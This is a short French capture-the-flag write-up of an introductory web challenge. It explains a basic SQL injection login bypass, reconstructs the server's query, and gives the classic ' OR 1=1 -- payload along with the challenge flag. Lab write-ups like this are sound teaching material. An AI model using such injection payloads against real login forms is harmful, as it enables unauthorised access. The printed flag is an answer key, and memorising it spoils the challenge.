SQLi

Catégorie: Web Difficulté: - Flag: CTFREI{SQLI_1s_0p}

Challenge

Challenge d'introduction au Web, arriveras-tu à te login en admin ?

PS : Regarde bien le titre et n'hésite pas à t'aider d'internet

ATTENTION: PAS BESOIN D'UTILISER SQLMAP OU D'AUTRES OUTILS D'AUTOMATISATION/SCAN

Ce challenge tourne sur un docker et n'est pas disponible

Une injection SQL basique, il faut imaginer la requête faite côté serveur :

SELECT * FROM users WHERE username = '<notre_username>' AND password = 'notre_password'.

Il faut donc envoyer un username ou un password de façon à modifier cette requête pour qu'elle renvoie forcément quelques chose :

SELECT * FROM users WHERE username = '' OR 1=1 --' AND password = 'notre_password'

On est alors connecté :

Dernière mise à jour il y a 9 mois

Cet article vous a-t-il été utile ?